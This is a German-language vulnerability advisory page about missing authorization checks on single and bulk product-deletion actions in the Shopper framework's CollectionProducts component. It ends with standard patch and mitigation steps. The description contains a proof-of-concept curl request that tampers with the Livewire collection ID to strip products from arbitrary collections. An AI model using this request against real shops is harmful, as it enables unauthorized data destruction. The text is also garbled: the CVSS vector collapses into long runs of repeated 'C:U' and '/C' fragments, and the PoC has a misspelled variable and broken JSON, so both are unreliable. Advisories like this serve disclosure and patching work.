Zum Inhalt springen
← Zurück zum Cyberlagebild
Zuletzt aktualisiert 11.09.2026 22:18

Shopper: Missing authorization on product removal actions in CollectionProducts component

CVSS –1 Quelle

Beschreibung

## Titel Fehlende Autorisierung für Produktentfernungsaktionen in CollectionProducts-Komponente ## Beschreibung Ein Mangel an Autorisierungskontrolle wurde sowohl bei der Pro-Record-Löschaktion als auch bei der Bulk-Löschaktion in `packages/admin/src/Livewire/Components/Collection/CollectionProducts.php` entdeckt. Weder die `Action::make('delete')` in Zeile 73 noch die `DeleteBulkAction::make()` in Zeile 91 tragen eine `->authorize(...)`-Kette. Die Komponente zeigt auch `public Collection $collection` ohne `#[Locked]`, so dass die Collection ID in der Livewire-Wire-Nutzlast veränderbar ist. Jede authentifizierte admin-panel-sitzung, einschließlich mitarbeitern, die nur "browse collections" haben, kann einzelne produkte oder alle produkte aus jeder sammlung in der datenbank entfernen. Severity CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C:U/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/C/ ```bash SESSION="laravel session=" XSRF="X-XSRF-TOKEN:" # Schritt 1: Notieren Sie sich die Collection ID, die Sie leeren möchten (z.B. collection id=5). # Schritt 2: Rufen Sie die Aktion der Bulk-Tabelle für die CollectionProducts-Komponente auf, # Ersetzen der Collection ID 5 im Komponentenzustand. curl -s -X POST http://localhost/shopper/livewire/update \ -H "Content-Type: application/json" \ -H "X-XSRF-TOKEN: $SRF" \ -H "Cookie: $SESSION" \ -H "X-Livewire: 1" \ -d '{ "components": [{ "snapshot": "PRODUCTS COMPONENT ID\",\"data\":{\"collection\":5},\"checksum\":\"...\"}, "updates": {}, "calls": ", "method": "callBulkAction", "params": ["delete", [1, 2, 3, 4, 5]] } }' # Erwartet: HTTP 200, alle aufgelisteten Produkt-IDs, die von der Sammlung 5 getrennt sind, # unabhängig davon, ob der Anrufer nur browse collections hat. ``` ## ..

Hersteller
Produktshopper/framework
Produktfamiliecomposer
Betroffene Versionen< 2.9.2
Behobene Versionen2.9.2

Quellen & weiterführende Informationen

Hier werden ausschließlich tatsächlich zu dieser Schwachstelle gespeicherte Quellenbelege angezeigt.

Was ist zur Behebung zu tun?

Auf eine behobene Version aktualisieren: 2.9.2.

PrioritätGelb
EinordnungZeitnah behandeln: hohes technisches Risiko.

Empfohlene Schritte

  • Betroffene Systeme identifizieren: shopper/framework.
  • Exposition prüfen: Internet-Erreichbarkeit, Admin-Oberflächen, VPN, Mail- oder Webdienste.
  • Update/Rollout auf behobene Version vorbereiten und priorisiert einspielen.
  • Nacharbeiten dokumentieren: betroffene Assets, Maßnahme, Zeitpunkt, Restrestrisiko.

Übergangsmaßnahmen

  • Zugriff auf betroffene Dienste auf vertrauenswürdige Netze einschränken.
  • WAF/IDS/EDR-Regeln und Hersteller-IOCs aktivieren, sofern verfügbar.
  • Nicht benötigte Funktionen, Plugins oder Dienste temporär deaktivieren.
  • Administrative Zugänge besonders absichern: MFA, Passwortrotation, Session-Invalidierung.